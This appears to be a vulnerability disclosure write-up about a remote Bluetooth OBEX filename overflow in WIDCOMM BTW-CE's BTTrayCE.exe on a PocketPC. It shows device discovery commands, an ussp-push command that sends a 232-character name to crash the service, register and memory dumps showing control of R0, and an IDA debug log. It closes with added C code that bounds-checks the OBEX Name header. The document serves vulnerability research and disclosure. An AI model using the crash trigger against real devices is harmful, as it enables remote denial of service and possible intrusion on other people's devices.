BTTrayCE.exe normally runs from \Windows\Startup on my PocketPC (iPAQ 2215) device. I am currently running WIDCOMM BTW-CE version 1.4.1 Build60.

In order to debug this issue you must first remove this file from the startup folder and soft boot the iPAQ. Open up IDA Pro Advanced 4.9 (32-bit) and choose Debugger -> Run -> Remote WinCE debugger. When the dialog comes up and asks for the path to the file, type in "\Windows\BTTrayCE.exe" and press OK.

You need to trigger the overflow from a remote machine with Bluetooth enabled.

kfinisterre@animosity:~/ussp-push-0.4$ hcitool scan
Scanning ...
        00:04:3E:65:A1:C8       Pocket_PC
kfinisterre@animosity:~/ussp-push-0.4$ sdptool browse 00:04:3E:65:A1:C8
Browsing 00:04:3E:65:A1:C8 ...
...
Service Name: OBEX Object Push
Service RecHandle: 0x10001
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2
  "OBEX" (0x0008)
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100
...

The following ussp-push command should trigger the overflow.

animosity:/home/kfinisterre/ussp-push-0.4# ./ussp-push 00:04:3E:65:A1:C8@2 /etc/hosts `perl -e 'print "A" x 232'`
pushing file /etc/hosts
name=/etc/hosts, size=257
Registered transport
set user data
created new objext
Local device 00:20:E0:4C:CF:DF
Remote device 00:04:3E:65:A1:C8 (2)
started a new request
reqdone
Command (00) has now finished, rsp: 20
Connected!
Connection return code: 0, id: 0
Connection established
connected to server
Sending file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, path: /etc/hosts, size: 257
reqdone

When the program crashes this is where we are.
coredll.dll:01F83AA0 loc_1F83AA0                             ; CODE XREF: coredll.dll:01F83AA8j
coredll.dll:01F83AA0                 LDR     R0, [R1,R0]!
coredll.dll:01F83AA4

$r0 is 41414141
$r1 is 240555A8

This is exactly AT $r1...

debug837:240555A8 DCB 0x41 ; A
debug837:240555A9 DCB 0x41 ; A
debug837:240555AA DCB 0x41 ; A
debug837:240555AB DCB 0x41 ; A
debug837:240555AC DCB 0x41 ; A
debug837:240555AD DCB 0x41 ; A
debug837:240555AE DCB 0x41 ; A
debug837:240555AF DCB 0x41 ; A
debug837:240555B0 DCB 0x41 ; A
debug837:240555B1 DCB 0x41 ; A
debug837:240555B2 DCB 0x41 ; A
debug837:240555B3 DCB 0x41 ; A
debug837:240555B4 DCB 0x41 ; A
debug837:240555B5 DCB 0x41 ; A
debug837:240555B6 DCB 0x41 ; A
debug837:240555B7 DCB 0x41 ; A
debug837:240555B8 DCB 0x41 ; A
debug837:240555B9 DCB 0x41 ; A
debug837:240555BA DCB 0x41 ; A
debug837:240555BB DCB 0x41 ; A
debug837:240555BC DCB 0x41 ; A
debug837:240555BD DCB 0x41 ; A
debug837:240555BE DCB 0x41 ; A
debug837:240555BF DCB 0x41 ; A
debug837:240555C0 DCB 0x41 ; A
debug837:240555C1 DCB 0x41 ; A
debug837:240555C2 DCB 0x41 ; A
debug837:240555C3 DCB 0x41 ; A
debug837:240555C4 DCB 0x41 ; A
debug837:240555C5 DCB 0x41 ; A
debug837:240555C6 DCB 0x41 ; A
debug837:240555C7 DCB 0x41 ; A
debug837:240555C8 DCB 0x41 ; A
debug837:240555C9 DCB 0x41 ; A
debug837:240555CA DCB 0x41 ; A
debug837:240555CB DCB 0x41 ; A
debug837:240555CC DCB 0x41 ; A
debug837:240555CD DCB 0x41 ; A
debug837:240555CE DCB 0x41 ; A
debug837:240555CF DCB 0x41 ; A
debug837:240555D0 DCB 0x41 ; A
debug837:240555D1 DCB 0x41 ; A
debug837:240555D2 DCB 0x41 ; A
debug837:240555D3 DCB 0x41 ; A
debug837:240555D4 DCB 0x41 ; A
debug837:240555D5 DCB 0x41 ; A
debug837:240555D6 DCB 0x41 ; A
debug837:240555D7 DCB 0x41 ; A
debug837:240555D8 DCB 0x41 ; A
debug837:240555D9 DCB 0x41 ; A
debug837:240555DA DCB 0x41 ; A
debug837:240555DB DCB 0x41 ; A
debug837:240555DC DCB 0x41 ; A
debug837:240555DD DCB 0x41 ; A
debug837:240555DE DCB 0x41 ; A
debug837:240555DF DCB 0x41 ; A
debug837:240555E0 DCB 0x41 ; A
debug837:240555E1 DCB 0x41 ; A
debug837:240555E2 DCB 0x41 ; A
debug837:240555E3 DCB 0x41 ; A
debug837:240555E4 DCB 0x41 ; A
debug837:240555E5 DCB 0x41 ; A
debug837:240555E6 DCB 0x41 ; A
debug837:240555E7 DCB 0x41 ; A
debug837:240555E8 DCB 0x41 ; A
debug837:240555E9 DCB 0x41 ; A
debug837:240555EA DCB 0x41 ; A
debug837:240555EB DCB 0x41 ; A
debug837:240555EC DCB 0x41 ; A
debug837:240555ED DCB 0x41 ; A
debug837:240555EE DCB 0x41 ; A
debug837:240555EF DCB 0x41 ; A
debug837:240555F0 DCB 0x53 ; S
debug837:240555F1 DCB    0

This is the data before $r1

debug837:240554FC DCB 0x5C ; \
debug837:240554FD DCB    0
debug837:240554FE DCB 0x54 ; T
debug837:240554FF DCB    0
debug837:24055500 DCB 0x65 ; e
debug837:24055501 DCB    0
debug837:24055502 DCB 0x6D ; m
debug837:24055503 DCB    0
debug837:24055504 DCB 0x70 ; p
debug837:24055505 DCB    0
debug837:24055506 DCB 0x5C ; \
debug837:24055507 DCB    0
debug837:24055508 DCB 0x41 ; A
debug837:24055509 DCB 0x41 ; A
debug837:2405550A DCB 0x41 ; A
debug837:2405550B DCB 0x41 ; A
debug837:2405550C DCB 0x41 ; A
debug837:2405550D DCB 0x41 ; A
debug837:2405550E DCB 0x41 ; A
debug837:2405550F DCB 0x41 ; A
debug837:24055510 DCB 0x41 ; A
debug837:24055511 DCB 0x41 ; A
debug837:24055512 DCB 0x41 ; A
debug837:24055513 DCB 0x41 ; A
debug837:24055514 DCB 0x41 ; A
debug837:24055515 DCB 0x41 ; A
debug837:24055516 DCB 0x41 ; A
debug837:24055517 DCB 0x41 ; A
debug837:24055518 DCB 0x41 ; A
debug837:24055519 DCB 0x41 ; A
debug837:2405551A DCB 0x41 ; A
debug837:2405551B DCB 0x41 ; A
debug837:2405551C DCB 0x41 ; A
debug837:2405551D DCB 0x41 ; A
debug837:2405551E DCB 0x41 ; A
debug837:2405551F DCB 0x41 ; A
debug837:24055520 DCB 0x41 ; A
debug837:24055521 DCB 0x41 ; A
debug837:24055522 DCB 0x41 ; A
debug837:24055523 DCB 0x41 ; A
debug837:24055524 DCB 0x41 ; A
debug837:24055525 DCB 0x41 ; A
debug837:24055526 DCB 0x41 ; A
debug837:24055527 DCB 0x41 ; A
debug837:24055528 DCB 0x41 ; A
debug837:24055529 DCB 0x41 ; A
debug837:2405552A DCB 0x41 ; A
debug837:2405552B DCB 0x41 ; A
debug837:2405552C DCB 0x41 ; A
debug837:2405552D DCB 0x41 ; A
debug837:2405552E DCB 0x41 ; A
debug837:2405552F DCB 0x41 ; A
debug837:24055530 DCB 0x41 ; A
debug837:24055531 DCB 0x41 ; A
debug837:24055532 DCB 0x41 ; A
debug837:24055533 DCB 0x41 ; A
debug837:24055534 DCB 0x41 ; A
debug837:24055535 DCB 0x41 ; A
debug837:24055536 DCB 0x41 ; A
debug837:24055537 DCB 0x41 ; A
debug837:24055538 DCB 0x41 ; A
debug837:24055539 DCB 0x41 ; A
debug837:2405553A DCB 0x41 ; A
debug837:2405553B DCB 0x41 ; A
debug837:2405553C DCB 0x41 ; A
debug837:2405553D DCB 0x41 ; A
debug837:2405553E DCB 0x41 ; A
debug837:2405553F DCB 0x41 ; A
debug837:24055540 DCB 0x41 ; A
debug837:24055541 DCB 0x41 ; A
debug837:24055542 DCB 0x41 ; A
debug837:24055543 DCB 0x41 ; A
debug837:24055544 DCB 0x41 ; A
debug837:24055545 DCB 0x41 ; A
debug837:24055546 DCB 0x41 ; A
debug837:24055547 DCB 0x41 ; A
debug837:24055548 DCB 0x41 ; A
debug837:24055549 DCB 0x41 ; A
debug837:2405554A DCB 0x41 ; A
debug837:2405554B DCB 0x41 ; A
debug837:2405554C DCB 0x41 ; A
debug837:2405554D DCB 0x41 ; A
debug837:2405554E DCB 0x41 ; A
debug837:2405554F DCB 0x41 ; A
debug837:24055550 DCB 0x41 ; A
debug837:24055551 DCB 0x41 ; A
debug837:24055552 DCB 0x41 ; A
debug837:24055553 DCB 0x41 ; A
debug837:24055554 DCB 0x41 ; A
debug837:24055555 DCB 0x41 ; A
debug837:24055556 DCB 0x41 ; A
debug837:24055557 DCB 0x41 ; A
debug837:24055558 DCB 0x41 ; A
debug837:24055559 DCB 0x41 ; A
debug837:2405555A DCB 0x41 ; A
debug837:2405555B DCB 0x41 ; A
debug837:2405555C DCB 0x41 ; A
debug837:2405555D DCB 0x41 ; A
debug837:2405555E DCB 0x41 ; A
debug837:2405555F DCB 0x41 ; A
debug837:24055560 DCB 0x41 ; A
debug837:24055561 DCB 0x41 ; A
debug837:24055562 DCB 0x41 ; A
debug837:24055563 DCB 0x41 ; A
debug837:24055564 DCB 0x41 ; A
debug837:24055565 DCB 0x41 ; A
debug837:24055566 DCB 0x41 ; A
debug837:24055567 DCB 0x41 ; A
debug837:24055568 DCB 0x41 ; A
debug837:24055569 DCB 0x41 ; A
debug837:2405556A DCB 0x41 ; A
debug837:2405556B DCB 0x41 ; A
debug837:2405556C DCB 0x41 ; A
debug837:2405556D DCB 0x41 ; A
debug837:2405556E DCB 0x41 ; A
debug837:2405556F DCB 0x41 ; A
debug837:24055570 DCB 0x41 ; A
debug837:24055571 DCB 0x41 ; A
debug837:24055572 DCB 0x41 ; A
debug837:24055573 DCB 0x41 ; A
debug837:24055574 DCB 0x41 ; A
debug837:24055575 DCB 0x41 ; A
debug837:24055576 DCB 0x41 ; A
debug837:24055577 DCB 0x41 ; A
debug837:24055578 DCB 0x41 ; A
debug837:24055579 DCB 0x41 ; A
debug837:2405557A DCB 0x41 ; A
debug837:2405557B DCB 0x41 ; A
debug837:2405557C DCB 0x41 ; A
debug837:2405557D DCB 0x41 ; A
debug837:2405557E DCB 0x41 ; A
debug837:2405557F DCB 0x41 ; A
debug837:24055580 DCB 0x41 ; A
debug837:24055581 DCB 0x41 ; A
debug837:24055582 DCB 0x41 ; A
debug837:24055583 DCB 0x41 ; A
debug837:24055584 DCB 0x41 ; A
debug837:24055585 DCB 0x41 ; A
debug837:24055586 DCB 0x41 ; A
debug837:24055587 DCB 0x41 ; A
debug837:24055588 DCB 0x41 ; A
debug837:24055589 DCB 0x41 ; A
debug837:2405558A DCB 0x41 ; A
debug837:2405558B DCB 0x41 ; A
debug837:2405558C DCB 0x41 ; A
debug837:2405558D DCB 0x41 ; A
debug837:2405558E DCB 0x41 ; A
debug837:2405558F DCB 0x41 ; A
debug837:24055590 DCB 0x41 ; A
debug837:24055591 DCB 0x41 ; A
debug837:24055592 DCB 0x41 ; A
debug837:24055593 DCB 0x41 ; A
debug837:24055594 DCB 0x41 ; A
debug837:24055595 DCB 0x41 ; A
debug837:24055596 DCB 0x41 ; A
debug837:24055597 DCB 0x41 ; A
debug837:24055598 DCB 0x41 ; A
debug837:24055599 DCB 0x41 ; A
debug837:2405559A DCB 0x41 ; A
debug837:2405559B DCB 0x41 ; A
debug837:2405559C DCB 0x41 ; A
debug837:2405559D DCB 0x41 ; A
debug837:2405559E DCB 0x41 ; A
debug837:2405559F DCB 0x41 ; A
debug837:240555A0 DCB 0x41 ; A
debug837:240555A1 DCB 0x41 ; A
debug837:240555A2 DCB 0x41 ; A
debug837:240555A3 DCB 0x41 ; A
debug837:240555A4 DCB 0x41 ; A
debug837:240555A5 DCB 0x41 ; A
debug837:240555A6 DCB 0x41 ; A
debug837:240555A7 DCB 0x41 ; A

IDA messages window for the debug session:

  bytes   pages size description
--------- ----- ---- --------------------------------------------
   262144    32 8192 allocating memory for b-tree...
    65536     8 8192 allocating memory for virtual array...
   262144    32 8192 allocating memory for name pointers...
-----------------------------------------------------------------
   589824            total memory allocated

Loading IDP module C:\Program Files\IDA\procs\pc.w32 for processor metapc...OK
Autoanalysis subsystem has been initialized.
Unloading IDP module C:\Program Files\IDA\procs\pc.w32...
Loading IDP module C:\Program Files\IDA\procs\arm.w32 for processor arm...OK
Connection to the Windows CE device has been established.
Debugger: Process started: \Windows\BTTrayCE.exe
Possible file format: PE executable (C:\Program Files\IDA\loaders\dbg.ldw)
Possible file format: MS-DOS executable (EXE) (C:\Program Files\IDA\loaders\dos.ldw)
Possible file format: Portable executable for ARM (PE) (C:\Program Files\IDA\loaders\pe.ldw)
Loading file '\Windows\BTTrayCE.exe' into database...
Detected file format: Portable executable for ARM (PE)
1015. Creating a new segment (00011000-00026A00) ... ... OK
1016. Creating a new segment (00027000-00029A00) ... ... OK
1017. Creating a new segment (0002A000-00033600) ... ... OK
1018. Creating a new segment (00034000-00035600) ... ... OK
1019. Creating a new segment (00036000-00037400) ... ... OK
Reading exports directory...
Reading imports directory...
1020. Creating a new segment (0002A4F8-00033600) ... ... OK
Assuming __cdecl calling convention by default
Flushing buffers, please wait...ok
File '\Windows\BTTrayCE.exe' is successfully loaded into the database.
Compiling file 'C:\Program Files\IDA\idc\ida.idc'...
Executing function 'main'...
Compiling file 'C:\Program Files\IDA\idc\onload.idc'...
Executing function 'OnLoad'...
IDA is analysing the input file...
You may start to explore the input file right now.
Debugger: Library loaded: \Windows\olece300.dll
Debugger: Library loaded: \Windows\doclist.dll
Debugger: Library loaded: \Windows\mfcce300.dll
Debugger: Library loaded: \Windows\BTChooserLib.dll
Debugger: Library loaded: \Windows\wbtapiCE.dll
Debugger: Library loaded: \Windows\note_prj.dll
Debugger: Library loaded: \Windows\toolhelp.dll
Debugger: Library loaded: \Windows\ceshell.dll
Debugger: Library loaded: \Windows\shutil.dll
Debugger: Library loaded: \Windows\tshres.dll
Debugger: Library loaded: \Windows\commctrl.dll
Debugger: Library loaded: \Windows\oleaut32.dll
Debugger: Library loaded: \Windows\ossvcs.dll
Debugger: Library loaded: \Windows\aygshell.dll
Debugger: Library loaded: \Windows\ole32.dll
Debugger: Library loaded: \Windows\coredll.dll
The initial autoanalysis has been finished.
Debugger: Thread started: id=334B0892, entry=00022360.
Debugger: Library loaded: \Windows\btrez.dll
Debugger: Thread started: id=B329EFDA, entry=01744594.
Debugger: Library loaded: \Windows\richink.dll
Debugger: Library loaded: \Windows\ws2.dll
Debugger: Library loaded: \Windows\winsock.dll
Debugger: Library loaded: \Windows\chngtrk.dll
Debugger: Library loaded: \Windows\outres.dll
Debugger: Library loaded: \Windows\cemapi.dll
Debugger: Library loaded: \Windows\BTCeOsif4.dll
Debugger: Library loaded: \Windows\pimutil.dll
Debugger: Library loaded: \Windows\calstore.dll
Debugger: Library loaded: \Windows\pimstore.dll
Debugged application message: Data Abort: Thread=935f0400 Proc=900d84b8 'BTTrayCE.exe'.
Debugged application message: AKY=00020001 PC=01f83aa0 RA=01f839dc BVA=684a991c FSR=000000f5.
BTTrayCE.exe: The instruction at 0x1F83AA0 referenced memory at 0x684A991C.
The memory could not be read (0x01F83AA0 -> 684A991C)
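The dump before $r1 shows the pushed name laid out directly after a wide-character \Temp\ prefix, consistent with the receiver building a temp path from the OBEX Name header without checking that it fits. As an added example (not code from this advisory or from WIDCOMM), the C below parses the Name header of an OBEX PUT and applies the bounds check a hardened receiver needs; the 64-unit buffer size, the function names and the packet builder are assumptions made here.

```c
/* Added example (not WIDCOMM's code): bounds-checked handling of the OBEX Name
 * header that BTTrayCE copies into a "\Temp\<name>" buffer. Sizes/names assumed. */
#include <stdint.h>
#include <string.h>

#define TEMP_PATH_UNITS 64   /* assumed capacity of the path buffer, in UTF-16 units */

/* Find the Name header (HI 0x01; 2-byte BE length that counts the 3-byte prefix;
 * UTF-16BE body). Returns the body and its byte length, or NULL if absent/malformed. */
const uint8_t *obex_name(const uint8_t *p, size_t n, size_t *blen)
{
    size_t total = n >= 3 ? (size_t)p[1] << 8 | p[2] : n + 1;   /* length field */
    if (total > n) return NULL;                                  /* truncated packet */
    for (size_t off = 3; off < total; ) {
        uint8_t hi = p[off];                                     /* top 2 bits = encoding */
        size_t hlen = (hi & 0xC0) == 0x80 ? 2 : (hi & 0xC0) == 0xC0 ? 5
                    : off + 3 <= total ? (size_t)p[off + 1] << 8 | p[off + 2] : 0;
        if ((hi < 0x80 && hlen < 3) || off + hlen > total) return NULL;  /* overrun */
        if (hi == 0x01) { *blen = hlen - 3; return p + off + 3; }
        off += hlen;
    }
    return NULL;
}

/* Build L"\Temp\" + name into out[out_units]. Returns 0, or -1 when the name would
 * not fit: the length check the crashing code never made. */
int build_temp_path(const uint8_t *nm, size_t blen, uint16_t *out, size_t out_units)
{
    static const uint16_t pfx[6] = { '\\', 'T', 'e', 'm', 'p', '\\' };
    size_t units = blen / 2;
    if (units && nm[blen - 2] == 0 && nm[blen - 1] == 0) units--;   /* drop the NUL */
    if (blen % 2 || 6 + units + 1 > out_units) return -1;         /* reject, never overflow */
    memcpy(out, pfx, sizeof pfx);
    for (size_t i = 0; i < units; i++) out[6 + i] = (uint16_t)(nm[2 * i] << 8 | nm[2 * i + 1]);
    out[6 + units] = 0;
    return 0;
}

/* Constructed input: final PUT (0x82), Length header 0xC3 = 257 (the advisory's
 * /etc/hosts size), then a Name header for an ASCII name. Returns the packet length. */
size_t make_put(const char *ascii, uint8_t *pkt)
{
    size_t len = strlen(ascii), hlen = 3 + 2 * (len + 1), total = 8 + hlen;
    uint8_t hdr[11] = { 0x82, (uint8_t)(total >> 8), (uint8_t)total, 0xC3, 0, 0, 1, 1,
                        0x01, (uint8_t)(hlen >> 8), (uint8_t)hlen };
    memcpy(pkt, hdr, sizeof hdr);
    for (size_t i = 0; i <= len; i++) { pkt[11 + 2 * i] = 0; pkt[12 + 2 * i] = (uint8_t)ascii[i]; }
    return total;
}
```

A 232-character name, the length used in the push above, is rejected before any copy happens, while a short name yields \Temp\hosts; a Name header whose declared length runs past the packet is rejected by the parser.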